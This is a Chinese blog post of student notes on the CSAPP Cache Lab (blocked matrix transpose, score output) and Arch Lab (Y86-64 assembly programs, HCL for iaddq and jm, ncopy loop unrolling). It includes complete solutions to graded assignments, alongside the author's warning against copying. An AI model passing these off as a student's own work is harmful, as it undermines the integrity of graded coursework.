距离理论最优值 1024(8x8 分块,64 个块,每个块 16 次 miss) 仍然有一定差距,但是已经很接近了,而且已经收获了满分。

如果你想继续优化,显然是要特别处理对角线上的块的,因为他们每次都会出现冲突不命中,所以可以通过先复制到一个临时块这样的方法来避免,这里就不展开了 ~~(才不是懒得卷了)~~。

60x68

测试指令:

make && ./test-trans -M 60 -N 68

满分线:misses <= 1600。

首先尝试 4x4 分块:

if (M == 60) {
    for (int i = 0; i < N; i += 4) { // 当前行
        for (int j = 0; j < M; j += 4) { // 当前列
            // 首先将 A[i][j]~A[i+3][j+3] 复制到 B[j][i]~B[j+3][i+3]
            for (int k = 0;k < 4;++k) {
                a = A[i + k][j];
                b = A[i + k][j + 1];
                c = A[i + k][j + 2];
                d = A[i + k][j + 3];
                B[j + k][i] = a;
                B[j + k][i + 1] = b;
                B[j + k][i + 2] = c;
                B[j + k][i + 3] = d;
            }
            // 转置 B
            for (int k = 0;k < 4;++k) {
                // 对角线不用交换
                for (int l = 0;l < k;++l) {
                    a = B[j + k][i + l];
                    B[j + k][i + l] = B[j + l][i + k];
                    B[j + l][i + k] = a;
                }
            }
        }
    }
}

运行:

make && ./test-trans -M 60 -N 68

得到:

Summary for official submission (func 0): correctness=1 misses=1623

发现似乎已经接近满分了啊?那我们只需要贪心地对大部分地方用 8x8 分块,再用 4x4 分块处理余下的部分就行了:

if (M == 60) {
    // 行列都不整除 8,但正好可以避免冲突不命中
    // 如果直接使用 4x4 分块,总 MISS 数为 1623,已经很接近满分
    // 再次基础上,再贪心拆出一个 8x8 分块,然后用 4x4 解决剩余部分,即可拿到满分
    // 总 MISS:1567
    // 8x8 分块处理 64x56 的部分
    for (int i = 0; i < 64; i += 8) {
        for (int j = 0; j < 56; j += 8) {
            for (int k = 0;k < 8;++k) {
                a = A[i + k][j];
                b = A[i + k][j + 1];
                c = A[i + k][j + 2];
                d = A[i + k][j + 3];
                e = A[i + k][j + 4];
                f = A[i + k][j + 5];
                g = A[i + k][j + 6];
                h = A[i + k][j + 7];
                B[j + k][i] = a;
                B[j + k][i + 1] = b;
                B[j + k][i + 2] = c;
                B[j + k][i + 3] = d;
                B[j + k][i + 4] = e;
                B[j + k][i + 5] = f;
                B[j + k][i + 6] = g;
                B[j + k][i + 7] = h;
            }
            // 转置 B
            for (int k = 0;k < 8;++k) {
                // 对角线不用交换
                for (int l = 0;l < k;++l) {
                    a = B[j + k][i + l];
                    B[j + k][i + l] = B[j + l][i + k];
                    B[j + l][i + k] = a;
                }
            }
        }
    }
    // 4x4 处理剩余部分
    for (int i = 0; i < N; i += 4) {
        for (int j = 56; j < M; j += 4) {
            for (int k = 0;k < 4;++k) {
                a = A[i + k][j];
                b = A[i + k][j + 1];
                c = A[i + k][j + 2];
                d = A[i + k][j + 3];
                B[j + k][i] = a;
                B[j + k][i + 1] = b;
                B[j + k][i + 2] = c;
                B[j + k][i + 3] = d;
            }
            // 转置 B
            for (int k = 0;k < 4;++k) {
                // 对角线不用交换
                for (int l = 0;l < k;++l) {
                    a = B[j + k][i + l];
                    B[j + k][i + l] = B[j + l][i + k];
                    B[j + l][i + k] = a;
                }
            }
        }
    }
    for (int i = 64; i < N; i += 4) {
        for (int j = 0; j < 56; j += 4) {
            for (int k = 0;k < 4;++k) {
                a = A[i + k][j];
                b = A[i + k][j + 1];
                c = A[i + k][j + 2];
                d = A[i + k][j + 3];
                B[j + k][i] = a;
                B[j + k][i + 1] = b;
                B[j + k][i + 2] = c;
                B[j + k][i + 3] = d;
            }
            // 转置 B
            for (int k = 0;k < 4;++k) {
                // 对角线不用交换
                for (int l = 0;l < k;++l) {
                    a = B[j + k][i + l];
                    B[j + k][i + l] = B[j + l][i + k];
                    B[j + l][i + k] = a;
                }
            }
        }
    }
}

运行:

make && ./test-trans -M 60 -N 68

得到:

Summary for official submission (func 0): correctness=1 misses=1567

完美!下播!

Handin

首先运行:

python driver.py

得到结果:

Part A: Testing cache simulator
Running ./test-csim
                        Your simulator     Reference simulator
Points (s,E,b)    Hits  Misses  Evicts    Hits  Misses  Evicts
     3 (1,1,1)       9       8       6       9       8       6  traces/yi2.trace
     3 (4,2,4)       4       5       2       4       5       2  traces/yi.trace
     3 (2,1,4)       2       3       1       2       3       1  traces/dave.trace
     3 (2,1,3)     694     453     449     694     453     449  traces/mem.trace
     3 (2,2,3)     201      37      29     201      37      29  traces/trans.trace
     3 (2,4,3)     212      26      10     212      26      10  traces/trans.trace
     3 (5,1,5)     231       7       0     231       7       0  traces/trans.trace
     6 (5,1,5)  265189   21777   21745  265189   21777   21745  traces/long.trace
    27

TEST_CSIM_RESULTS=27

                        Your simulator     Reference simulator
Points (s,E,b)    Hits  Misses  Evicts    Hits  Misses  Evicts
     3 (1,1,1)       9       8       6       9       8       6  traces/yi2.trace
     3 (4,2,4)       4       5       2       4       5       2  traces/yi.trace
     3 (2,1,4)       2       3       1       2       3       1  traces/dave.trace
     3 (2,1,3)     694     453     449     694     453     449  traces/mem.trace
     3 (2,2,3)     201      37      29     201      37      29  traces/trans.trace
     3 (2,4,3)     212      26      10     212      26      10  traces/trans.trace
     3 (5,1,5)     231       7       0     231       7       0  traces/trans.trace
     6 (5,1,5)  265189   21777   21745  265189   21777   21745  traces/long.trace
    27


Part B: Testing transpose function
Running ./test-trans -M 32 -N 32 -t
Running ./test-trans -M 64 -N 64 -t
Running ./test-trans -M 60 -N 68 -t

Cache Lab summary:
                        Points   Max pts      Misses
Csim correctness          27.0        27
Trans perf 32x32           8.0         8         260
Trans perf 64x64           8.0         8        1148
Trans perf 60x68          10.0        10        1567
          Total points    53.0        53

注意阅读 README 中要求的代码格式:

  • 缺少标题注释或标题注释不具描述性:扣 2 分
  • 缺少函数头注释或函数头注释不具描述性:每处扣 1 分,最多扣 2 分
  • 缩进不一致:扣 2 分
  • 行长度严重超过 80 个字符(仅限极端情况):每处扣 1 分,最多扣 2 分
  • 错误检查不充分:扣 1 分
  • 任何其他严重影响可读性的问题:扣 2 分

本仓库内提供了一个 test-length.py 脚本,可以检查行长度是否超过 80 个字符,使用方法:

python test-length.py

注意,提交前一定要先 make 并生成 handin.tar,然后改个名交了就行啦。

Other

一些别的我觉得可能有用的教程:

NFLS-CHINA / CSAPP - Cache Lab 的更(最)优秀的解法 :暂存想法的来源,很生动的图示。

孟永康 / 《深入理解计算机系统》配套实验:Cache Lab :很好的解析了为什么尺寸变化会出现冲突。配有测试程序。

💾

更适合北大宝宝体质的 Arch Lab 踩坑记

2023年10月25日 14:56

[!CAUTION]

致各位同学:本笔记的撰写目的是用作参考,请勿直接抄袭,否则后果自负。

我的推荐做法是,你可以阅读我的博文后了解都有哪些坑,但自己实现的时候千万不要看我的代码,避免抄袭风险。

PartA

本节所需程序在 sim/misc 下,要做的事情是编写 .ys 的汇编代码,然后执行:

./yas xxx.ys && ./yis xxx.yo

来实现所要求的功能即可。

在做本节内容前,推荐安装 VS Code Y86 语法扩展以获得高亮编码体验:

https://marketplace.visualstudio.com/items?itemName=abhinavk99.y86-vscode

sum.ys

参照给出的示例代码 y86-code,总结出如下代码格式并通过:

# 设置初始地址为0
    .pos 0
    irmovq stack, %rsp # 设置栈顶
    call main # 调用main函数
    halt # 终止程序

# 设置初始链表
    .align 8
ele1:
    .quad 0x00a
    .quad ele2
ele2:
    .quad 0x0b0
    .quad ele3
ele3:
    .quad 0xc00
    .quad 0

main:
    irmovq ele1, %rdi # 设置第一个元素的地址(即链表的头指针)为第一个参数
    call sum_list # 调用sum_list函数
    ret # 返回

sum_list:
    pushq %rbp # 保存rbp
    xorq %rax, %rax # 将rax(val)置零
    jmp test # 跳转到test

loop:
    mrmovq (%rdi), %rsi # 将rdi指向的地址的值(即链表当前元素的值)赋给rsi
    addq %rsi, %rax # 将rsi的值加到rax中
    mrmovq 8(%rdi), %rdi # 将下一个元素的地址赋给rdi
    jmp test # 跳转到test

test:
    andq %rdi, %rdi # 比较rdi和0
    jne loop # 如果不相等,跳转到loop
    popq %rbp # 恢复rbp
    ret # 返回

# 设置栈顶地址
    .pos 0x200
stack:

这种写法是 jump to the middle 写法,特别要注意 callret 要匹配,否则即使你的程序停止了,也不是 halt 语句停止的,而是遇到了 00 内存停止的(可以最后观察 PC)。

也可以采用 guarded do 写法,因为注意到 %rsi 初始条件必不为零,所以可以改成:

    .pos 0
    irmovq stack,%rsp
    call main
    halt

.align 8
ele1:
    .quad 0x00a
    .quad ele2
ele2:
    .quad 0x0b0
    .quad ele3
ele3:
    .quad 0xc00
    .quad 0

main:
    irmovq ele1, %rdi
    call sum_list
    ret

sum_list:
    pushq %r8
    xorq %rax,%rax
# grarded do
loop:
    andq %rdi,%rdi
    je loopEnd
    mrmovq (%rdi),%r8
    addq %r8,%rax
    mrmovq 8(%rdi),%rdi
    jmp loop
loopEnd:

    popq %r8
    ret

.pos 0x200
stack:

注意最后要多留一行空白行作为文件结尾。

运行:

./yas sum.ys && ./yis sum.yo

观察到

%rax: 0x0000000000000000 0x0000000000000cba

成功!

rsum.ys

要求写个递归版本的,因为每次调用函数 val 都会改变,因而需要考虑使用 pushq/popq 保留局部变量:

# 设置初始地址为0
    .pos 0
    irmovq stack, %rsp # 设置栈顶
    call main # 调用main函数
    halt # 终止程序

# 设置初始链表
    .align 8
ele1:
    .quad 0x00a
    .quad ele2
ele2:
    .quad 0x0b0
    .quad ele3
ele3:
    .quad 0xc00
    .quad 0

main:
    irmovq ele1, %rdi
    call rsum_list
    ret

rsum_list:
    andq %rdi, %rdi
    je base
    mrmovq (%rdi), %rdx
    pushq %rdx
    mrmovq $8(%rdi), %rdi
    call rsum_list
    popq %rdx
    addq %rdx, %rax
    ret

base:
    xorq %rax, %rax
    ret

    .pos 0x200
stack:

运行:

./yas rsum.ys && ./yis rsum.yo

观察到

%rax: 0x0000000000000000 0x0000000000000cba

成功!

bubble.ys

要求使用冒泡排序,增序排序一个数组。

首先将代码转换为等价的 Goto 版本:

void bubble_sort(long* data, long count) {
    long* last = data + count - 1;
test1:
    if (last <= data) {
        goto end;
    }
loop1:
    long* i = data;
test2:
    if (i >= last) {
        goto end2;
    }
loop2:
    if (*(i + 1) < *i) {
        long t = *(i + 1);
        *(i + 1) = *i;
        *i = t;
    }
    i++;
    goto test2;
end2:
    last--;
    goto test1;
end:
    return;
}

然后对着翻译就可以了。

其他还要注意的点就是,对于指针的加减,是按照类型的长度去加的,所以应当加 (%rsi-1) * 8 个字节才对。

以下是我 debug 了 2 个小时的代码,你看出来哪里错了吗?

# 设置初始地址为0
    .pos 0
    irmovq stack, %rsp # 设置栈顶
    call main # 调用main函数
    halt # 终止程序
# 设置初始数组
    .align 8
Array:
    .quad 0xbca
    .quad 0xcba
    .quad 0xacb
    .quad 0xcab
    .quad 0xabc
    .quad 0xbac

main:
    irmovq Array, %rdi
    irmovq $6, %rsi
    call bubble_sort
    ret

bubble_sort:
    # rsi * 8
    addq %rsi, %rsi
    addq %rsi, %rsi
    addq %rsi, %rsi
    # 把 rsi 搞成 last,即 init-expr
    addq %rdi, %rsi
    # 加减的常数 r13 = 8
    irmovq $8, %r13
    subq %r13, %rsi

# 循环 1 的 text-expr
test:
    # last - data <= 0 就结束
    rrmovq %rdi, %r8 # data
    subq %rsi, %r8 # data - last
    jge end # data - last >= 0 跳转

loop1:
    # rbx 是 i
    # 第 2 个循环的 init-expr
    rrmovq %rdi, %rbx # i = data

test2:
    rrmovq %rbx, %r8 # i
    subq %rsi, %r8 # i - last
    jge end2 # i - last >= 0 跳转

loop2:
    # *i 是 r11,*(i+1) 是 r10
    mrmovq $8(%rbx), %r10 # r10 = *(i+1)
    mrmovq (%rbx), %r11 # r11 = *i
    rrmovq %r11, %r8 # r12 = *i
    subq %r10, %r8 # if (*i > *(i+1))
    jle end4
    rmmovq %r11, $8(%rbx)
    rmmovq %r10, (%rbx)

# 循环 2 的 update-expr
end4:
    addq %r13, %rbx
    jmp test2

# 循环 1 的 update-expr
end2:
    subq %r13, %rsi
    jmp test

# 循环 1 判断终止
end:
    ret

    .pos 200
stack:

哈哈,我也没看出来,我花了一个小时,疯狂的改逻辑都没看出来,甚至实在受不了了,往栈上 push 变量看,然后发现 push 几个就 ADR 了,这才发现我草,我怎么栈开的是 200 而不是 0x200

值得一提的是,我们虽然没有使用任何的 push/pop,但是错误的栈指针仍然导致了问题。这是因为我们使用了 ret/call 导致的。观察 bubble.yo 也可以发现,我们的程序代码已经占用了 0x0 ~ 0xe1 之间的所有空间,而 200 的 16 进制表示恰为 0xc8,所以在程序 ret 的时候会导致类似于之前 AttackLab 里出现的,“错误的执行 / 理解代码”

于是,略作修改就过了:

# 设置初始地址为0
    .pos 0
    irmovq stack, %rsp # 设置栈顶
    call main # 调用main函数
    halt # 终止程序
# 设置初始数组
    .align 8
Array:
    .quad 0xbca
    .quad 0xcba
    .quad 0xacb
    .quad 0xcab
    .quad 0xabc
    .quad 0xbac

main:
    irmovq Array, %rdi
    irmovq $6, %rsi
    call bubble_sort
    ret

bubble_sort:
    # rsi * 8
    addq %rsi, %rsi
    addq %rsi, %rsi
    addq %rsi, %rsi
    # 把 rsi 搞成 last,即 init-expr
    addq %rdi, %rsi
    # 加减的常数 r13 = 8
    irmovq $8, %r13
    subq %r13, %rsi

# 循环 1 的 text-expr
test:
    # last - data <= 0 就结束
    rrmovq %rdi, %r8 # data
    subq %rsi, %r8 # data - last
    jge end # data - last >= 0 跳转

loop1:
    # rbx 是 i
    # 第 2 个循环的 init-expr
    rrmovq %rdi, %rbx # i = data

test2:
    rrmovq %rbx, %r8 # i
    subq %rsi, %r8 # i - last
    jge end2 # i - last >= 0 跳转

loop2:
    # *i 是 r11,*(i+1) 是 r10
    mrmovq $8(%rbx), %r10 # r10 = *(i+1)
    mrmovq (%rbx), %r11 # r11 = *i
    rrmovq %r11, %r8 # r12 = *i
    subq %r10, %r8 # if (*i > *(i+1))
    jle end4
    rmmovq %r11, $8(%rbx)
    rmmovq %r10, (%rbx)

# 循环 2 的 update-expr
end4:
    addq %r13, %rbx
    jmp test2

# 循环 1 的 update-expr
end2:
    subq %r13, %rsi
    jmp test

# 循环 1 判断终止
end:
    ret

    .pos 0x200
stack:

Changes to memory:
0x0018: 0x0000000000000bca 0x0000000000000abc
0x0020: 0x0000000000000cba 0x0000000000000acb
0x0028: 0x0000000000000acb 0x0000000000000bac
0x0030: 0x0000000000000cab 0x0000000000000bca
0x0038: 0x0000000000000abc 0x0000000000000cab
0x0040: 0x0000000000000bac 0x0000000000000cba
0x01f0: 0x0000000000000000 0x0000000000000065
0x01f8: 0x0000000000000000 0x0000000000000013

PartB

需要在 sim/seq 目录下执行各指令。

具体需要用到的指令参见 handout,在此不赘述。

在做本节内容前,推荐安装 VS Code HCL 语法扩展以获得高亮编码体验与自动格式化:

https://marketplace.visualstudio.com/items?itemName=BojunRen.hcl-support

注意不要安装名为 HCL Format 的格式化代码插件,那个东西用了会导致问题。

IADDQ

iaddq V, rB:将常量 V 加到 rB 上

Cleanshot-2023-10-25-at-12.30.25@2x

附图来自英文原版 Computer_Systems_A_Programmers_Perspective (3rd) P405

参考 irmovq 指令,我们将 CSAPP P254 给出的 iaddq 指令修改为如下几个阶段

  • Fetch
    • icode:ifun ← M1[PC]
    • rA:rB ← M1[PC+1]
    • valC ← M8[PC+2]
    • valP ← PC+10
  • Decode
    • valB ← R[rB]
  • Execute
    • valE ← valC+valB
    • Set CC
  • Memory
  • Write Back
    • R[rB] ← valE
  • PC Update
    • PC ← valP

为什么不能采用 rA 作为寄存器输入源?因为 valC 和 valA 都只能连接到 ALU_A,所以只能采用 rB 作为的寄存器输入源,输入到 ALU_B。

正常写就好,没啥难的,只需注意:

  • 务必在文件开头注明姓名学号与新指令的各个阶段做了什么的说明
  • iaddq 的 icode 为 IIADDQ(两个 I)
  • IIADDQ 会设置条件码(这个特性在 PartC 中十分有用)
  • 不要问为什么找不到写回寄存器的阶段,写回和译码是一起的。

IJMQ

jm rB, V:跳转到 M [rB+V] 的地址

参考 rmmovqret 指令

  • Fetch
    • icode:ifun ← M1[PC]
    • rA:rB ← M1[PC+1]
    • valC ← M8[PC+2]
    • valP ← PC+10
  • Decode
    • valB ← R[rB]
  • Execute
    • valE ← valC+valB
  • Memory
    • valM ← M8[valE]
  • Write Back
  • PC Update
    • PC ← valM

也是没啥难的,甚至没啥需要注意的,只要别忘了写各个阶段干了什么就行。

只需要按照 handout 里给出的逐步做就好。

以下是 PartB 的完整答案:

#  Stages for iaddq V, rB: add constant V to rB
#
# * Fetch
#   * icode:ifun ← M1[PC]
#   * rA:rB ← M1[PC+1]
#   * valC ← M8[PC+2]
#   * valP ← PC+10
# * Decode
#   * valB ← R[rB]
# * Execute
#   * valE ← valC+valB
#   * Set CC
# * Memory
# * Write Back
#   * R[rB] ← valE
# * PC Update
#   * PC ← valP
# ---------------------------
# Stages for jm rB, V: jump to M[rB+V]
#
# * Fetch
#   * icode:ifun ← M1[PC]
#   * rA:rB ← M1[PC+1]
#   * valC ← M8[PC+2]
#   * valP ← PC+10
# * Decode
#   * valB ← R[rB]
# * Execute
#   * valE ← valC+valB
# * Memory
#   * valM ← M8[valE]
# * Write Back
# * PC Update
#   * PC ← valM
#/* $begin seq-all-hcl */
####################################################################
#  HCL Description of Control for Single Cycle Y86-64 Processor SEQ   #
#  Copyright (C) Randal E. Bryant, David R. O'Hallaron, 2010       #
####################################################################

## Your task is to implement the iaddq instruction
## The file contains a declaration of the icodes
## for iaddq (IIADDQ)
## Your job is to add the rest of the logic to make it work

####################################################################
#    C Include's.  Don't alter these                               #
####################################################################

quote '#include <stdio.h>'
quote '#include "isa.h"'
quote '#include "sim.h"'
quote 'int sim_main(int argc, char *argv[]);'
quote 'word_t gen_pc(){return 0;}'
quote 'int main(int argc, char *argv[])'
quote '  {plusmode=0;return sim_main(argc,argv);}'

####################################################################
#    Declarations.  Do not change/remove/delete any of these       #
####################################################################

##### Symbolic representation of Y86-64 Instruction Codes #############
wordsig INOP 	'I_NOP'
wordsig IHALT	'I_HALT'
wordsig IRRMOVQ	'I_RRMOVQ'
wordsig IIRMOVQ	'I_IRMOVQ'
wordsig IRMMOVQ	'I_RMMOVQ'
wordsig IMRMOVQ	'I_MRMOVQ'
wordsig IOPQ	'I_ALU'
wordsig IJXX	'I_JMP'
wordsig ICALL	'I_CALL'
wordsig IRET	'I_RET'
wordsig IPUSHQ	'I_PUSHQ'
wordsig IPOPQ	'I_POPQ'
# Instruction code for iaddq instruction
wordsig IIADDQ	'I_IADDQ'
#Instruction code for jm instruction
wordsig IJM     'I_JM'

##### Symbolic represenations of Y86-64 function codes                  #####
wordsig FNONE    'F_NONE'        # Default function code

##### Symbolic representation of Y86-64 Registers referenced explicitly #####
wordsig RRSP     'REG_RSP'    	# Stack Pointer
wordsig RNONE    'REG_NONE'   	# Special value indicating "no register"

##### ALU Functions referenced explicitly                            #####
wordsig ALUADD	'A_ADD'		# ALU should add its arguments

##### Possible instruction status values                             #####
wordsig SAOK	'STAT_AOK'	# Normal execution
wordsig SADR	'STAT_ADR'	# Invalid memory address
wordsig SINS	'STAT_INS'	# Invalid instruction
wordsig SHLT	'STAT_HLT'	# Halt instruction encountered

##### Signals that can be referenced by control logic ####################

##### Fetch stage inputs		#####
wordsig pc 'pc'				# Program counter
##### Fetch stage computations		#####
wordsig imem_icode 'imem_icode'		# icode field from instruction memory
wordsig imem_ifun  'imem_ifun' 		# ifun field from instruction memory
wordsig icode	  'icode'		# Instruction control code
wordsig ifun	  'ifun'		# Instruction function
wordsig rA	  'ra'			# rA field from instruction
wordsig rB	  'rb'			# rB field from instruction
wordsig valC	  'valc'		# Constant from instruction
wordsig valP	  'valp'		# Address of following instruction
boolsig imem_error 'imem_error'		# Error signal from instruction memory
boolsig instr_valid 'instr_valid'	# Is fetched instruction valid?

##### Decode stage computations		#####
wordsig valA	'vala'			# Value from register A port
wordsig valB	'valb'			# Value from register B port

##### Execute stage computations	#####
wordsig valE	'vale'			# Value computed by ALU
boolsig Cnd	'cond'			# Branch test

##### Memory stage computations		#####
wordsig valM	'valm'			# Value read from memory
boolsig dmem_error 'dmem_error'		# Error signal from data memory


####################################################################
#    Control Signal Definitions.                                   #
####################################################################

################ Fetch Stage     ###################################

# Determine instruction code
word icode = [
    imem_error: INOP;
    1: imem_icode;		# Default: get from instruction memory
];

# Determine instruction function
word ifun = [
    imem_error: FNONE;
    1: imem_ifun;		# Default: get from instruction memory
];

bool instr_valid = icode in
    { INOP, IHALT, IRRMOVQ, IIRMOVQ, IRMMOVQ, IMRMOVQ,
           IOPQ, IJXX, ICALL, IRET, IPUSHQ, IPOPQ, IIADDQ, IJM };

# Does fetched instruction require a regid byte?
bool need_regids =
    icode in { IRRMOVQ, IOPQ, IPUSHQ, IPOPQ,
             IIRMOVQ, IRMMOVQ, IMRMOVQ, IIADDQ, IJM };

# Does fetched instruction require a constant word?
bool need_valC =
    icode in { IIRMOVQ, IRMMOVQ, IMRMOVQ, IJXX, ICALL, IIADDQ, IJM };

################ Decode Stage    ###################################

## What register should be used as the A source?
word srcA = [
    icode in { IRRMOVQ, IRMMOVQ, IOPQ, IPUSHQ  } : rA;
    icode in { IPOPQ, IRET } : RRSP;
    1 : RNONE; # Don't need register
];

## What register should be used as the B source?
word srcB = [
    icode in { IOPQ, IRMMOVQ, IMRMOVQ, IIADDQ, IJM  } : rB;
    icode in { IPUSHQ, IPOPQ, ICALL, IRET } : RRSP;
    1 : RNONE;  # Don't need register
];

## What register should be used as the E destination?
word dstE = [
    icode in { IRRMOVQ } && Cnd : rB;
    icode in { IIRMOVQ, IOPQ, IIADDQ} : rB;
    icode in { IPUSHQ, IPOPQ, ICALL, IRET } : RRSP;
    1 : RNONE;  # Don't write any register
];

## What register should be used as the M destination?
word dstM = [
    icode in { IMRMOVQ, IPOPQ } : rA;
    1 : RNONE;  # Don't write any register
];

################ Execute Stage   ###################################

## Select input A to ALU
word aluA = [
    icode in { IRRMOVQ, IOPQ } : valA;
    icode in { IIRMOVQ, IRMMOVQ, IMRMOVQ, IIADDQ, IJM } : valC;
    icode in { ICALL, IPUSHQ } : -8;
    icode in { IRET, IPOPQ } : 8;
    # Other instructions don't need ALU
];

## Select input B to ALU
word aluB = [
    icode in { IRMMOVQ, IMRMOVQ, IOPQ, ICALL,
              IPUSHQ, IRET, IPOPQ, IIADDQ, IJM } : valB;
    icode in { IRRMOVQ, IIRMOVQ } : 0;
    # Other instructions don't need ALU
];

## Set the ALU function
word alufun = [
    icode == IOPQ : ifun;
    1 : ALUADD;
];

## Should the condition codes be updated?
bool set_cc = icode in { IOPQ, IIADDQ };

################ Memory Stage    ###################################

## Set read control signal
bool mem_read = icode in { IMRMOVQ, IPOPQ, IRET, IJM };

## Set write control signal
bool mem_write = icode in { IRMMOVQ, IPUSHQ, ICALL };

## Select memory address
word mem_addr = [
    icode in { IRMMOVQ, IPUSHQ, ICALL, IMRMOVQ, IJM } : valE;
    icode in { IPOPQ, IRET } : valA;
    # Other instructions don't need address
];

## Select memory input data
word mem_data = [
    # Value from register
    icode in { IRMMOVQ, IPUSHQ } : valA;
    # Return PC
    icode == ICALL : valP;
    # Default: Don't write anything
];

## Determine instruction status
word Stat = [
    imem_error || dmem_error : SADR;
    !instr_valid: SINS;
    icode == IHALT : SHLT;
    1 : SAOK;
];

################ Program Counter Update ############################

## What address should instruction be fetched at

word new_pc = [
    # Call.  Use instruction constant
    icode == ICALL : valC;
    # Taken branch.  Use instruction constant
    icode == IJXX && Cnd : valC;
    # Completion of RET instruction.  Use value from stack
    icode in { IRET, IJM } : valM;
    # Default: Use incremented PC
    1 : valP;
];
#/* $end seq-all-hcl */

执行:

(cd ../ptest; make SIM=../seq/ssim TFLAGS=-ij)

通过!

./optest.pl -s ../seq/ssim -ij
Simulating with ../seq/ssim
All 59 ISA Checks Succeed
./jtest.pl -s ../seq/ssim -ij
Simulating with ../seq/ssim
All 96 ISA Checks Succeed
./ctest.pl -s ../seq/ssim -ij
Simulating with ../seq/ssim
All 22 ISA Checks Succeed
./htest.pl -s ../seq/ssim -ij
Simulating with ../seq/ssim
All 756 ISA Checks Succeed

PartC

指令

需要在 sim/pipe 目录下执行各指令

有用指令包括:

检查长度是否超过 1000 Byte 的限制

../misc/yas ncopy.ys && ./check-len.pl < ncopy.yo

检查正确性

./correctness.pl

修改 pipe-full.hcl 后,重新构建模拟器

make clean; make psim VERSION=full

修改 ncopy.ys 后,检查 CPE、本地跑分

make drivers && ./benchmark.pl

优化思路

堪称本 Lab 最难的部分。

虽然 handout 中直接给出了直译版本的 ncopy,但是这显然没什么用:

# Function prologue.
# %rdi = src, %rsi = dst, %rdx = len
ncopy:

##################################################################
# You can modify this portion
    # Loop header
    xorq %rax,%rax		# count = 0;
    andq %rdx,%rdx		# len <= 0?
    jle Done		# if so, goto Done:

Loop:
    mrmovq (%rdi), %r10	# read val from src...
    rmmovq %r10, (%rsi)	# ...and store it to dst
    andq %r10, %r10		# val <= 0?
    jle Npos		# if so, goto Npos:
    irmovq $1, %r10
    addq %r10, %rax		# count++
Npos:
    irmovq $1, %r10
    subq %r10, %rdx		# len--
    irmovq $8, %r10
    addq %r10, %rdi		# src++
    addq %r10, %rsi		# dst++
    andq %rdx,%rdx		# len > 0?
    jg Loop			# if so, goto Loop:
##################################################################
# Do not modify the following section of code
# Function epilogue.
Done:
    ret

直接测试发现其 CPE 高达 15.18,收获 0 分的好成绩!

Average CPE 15.18
Score 0.0/60.0

那么我们有什么办法来优化这个程序呢?

通过观察,我们发现此程序存在如下问题:

  • 初始化置零了 rax,而这并不是必要的
  • 每次循环都要判断 len 是否大于 0、更新起始地址 rdi 和目标地址 rsi,这非常耗时,可以使用循环展开来减少这些开销
  • 循环体内,mrmovqrmmovq 丝滑小连招,造成了数据冒险(加载 / 使用冒险),所以每次都需要暂停(即插入一个气泡,下同,可能不加以区分) 1 个气泡周期(分析方法:rmmovq 需要进入 M(4) 写回阶段才能读取出来正确的内存数据,mrmovq 才能进入 D(2) 解码阶段,$4-2-1=1$,即中间需要插入 1 条指令或者冒泡 1 次),可以使用 “戳气泡” 技术来减少这些开销
  • 每次判断当前取出数是否为正数,都是用的是 andq + jle,这会造成控制冒险,每次预测失败都会有 2 个气泡周期的惩罚,我们可以使用类似 “戳气泡” 的办法来避免预测失败,从而减少这些开销
  • Npos 内,屡屡 irmovq 然后 addq,造成的数据冒险虽然可以通过转发来规避,但是我们可以使用 PartB 中实现的 iaddq 来减少一个周期

好的,我们遇到了两个关键词:循环展开、戳气泡。这是什么意思呢?

首先介绍循环展开。有关循环展开的内容在书的第 5.8 章(P366),循环展开是一种复用循环体的 update-expr,同时通过累积变量提高并行度的技术,其思想类似如下代码:

# before
sum = 0
for(i=0;i<10;i++):
    sum += i

# after
sum1 = 0
sum2 = 0
for(i=0;i<10;i+=2):
    sum1 += i
    sum2 += i+1
sum = sum1 + sum2

其中,每次循环体内的 body-statement 重复执行的次数称为循环展开的路数。在上面的例子中,路数为 2。

可以想到的是,路数越高,循环展开的效率也就越高,但是当路数变高的同时还有一个负面作用,就是当循环次数 $n$ 并不能整除路数 $w$ 的时候,我们总是需要额外处理余数部分。而路数越高,我们在处理余数部分时需要的指令数也就越多,同时我们可能会因为寄存器不足于是需要压栈变量反而造成性能下降。极端状况下 $w \to +\infty$,这时候我们的代码就展开了个寂寞。

除了简单的复用 update-expr,循环展开的最大优势在于可以通过累积变量来提高并行度。在上面的例子中,我们可以看到,sum1sum2 是完全独立的,所以我们可以将其放到不同的寄存器中,减少关键路径的长度(即关键路径上的指令数),从而提高效率。

比如,在上面例子的第一种实现内,我们每次循环,不仅需要更新 i,还要更新 sum,每次循环需要 2 条指令,所有指令都在关键路径上,所以关键路径的总长度为 $10 \times 2 = 20$。

而在第二种实现内,我们每两次循环才需要更新 1 次 i 不说,每次循环内我们对于 sum1sum2 的更新可以完全独立开(也就是并行),所以关键路径的总长度为 $5 \times 2 = 10$。

当然,这只是简略的估计,有关循环展开的更多内容还是需要参考书本加以理解。

再说第二个关键词:戳气泡。这是一种在流水线中避免控制冒险的技术,其思想是替换原本为了避免各种冒险(即暂停)所加入的气泡周期中为一条并不相关的有效指令,从而避免了气泡带来的等待开销,提高流水线的效率。

在本 Lab 中,我们会将这种技术使用到极致,从而最大可能的降低 CPE(Cycle Per Element,每个元素所需周期数)以获得更高的分数。

优化过程

循环展开

首先,我们使用 8 路循环展开(经实测,9/10 路展开也可以获得同样的分数,树洞也有大佬使用 7 路循环展开获得了更极致的分数,但我不知道怎么做就是了)。

ncopy:
    # 8路循环展开,优点是余数处理的时候可以平衡地使用二叉树搜索,从而只需要3次平均判断次数
    iaddq $-8, %rdx
    jl handle_remainder
    # 进行8路循环展开,一次性将8个数读入到寄存器中,使用不同的寄存器保证流水线满速运行
    # 由于使用了不同的寄存器,所以不存在任何的数据冒险,也就不需要暂停,从而可以优化 CPE
loop_unrolling_8_way:
    mrmovq (%rdi), %r8
    mrmovq 8(%rdi), %r9
    mrmovq 16(%rdi), %r10
    mrmovq 24(%rdi), %r11
    mrmovq 32(%rdi), %r12
    mrmovq 40(%rdi), %r13
    mrmovq 48(%rdi), %r14
    mrmovq 56(%rdi), %rcx

    # 判断这8个读入的数据是否大于0,大于0则将其写入到dst中,同时计数器加1
judge_and_write_num_0:
    # 判断第一个数是否大于0
    andq %r8, %r8
    rmmovq %r8, (%rsi)
    jle judge_and_write_num_1
    iaddq $1, %rax
...
judge_and_write_num_7:
    andq %rcx, %rcx
    rmmovq %rcx, 56(%rsi)
    jle update_expr
    iaddq $1, %rax
update_expr:
    # 更新循环参数
    # rdi, rsi 都可以改,因为本次循环中的数据已经被写入到了 dst 中,且完成了正数判断
    # 所以不会再次使用,只需待循环结束时再去处理余数
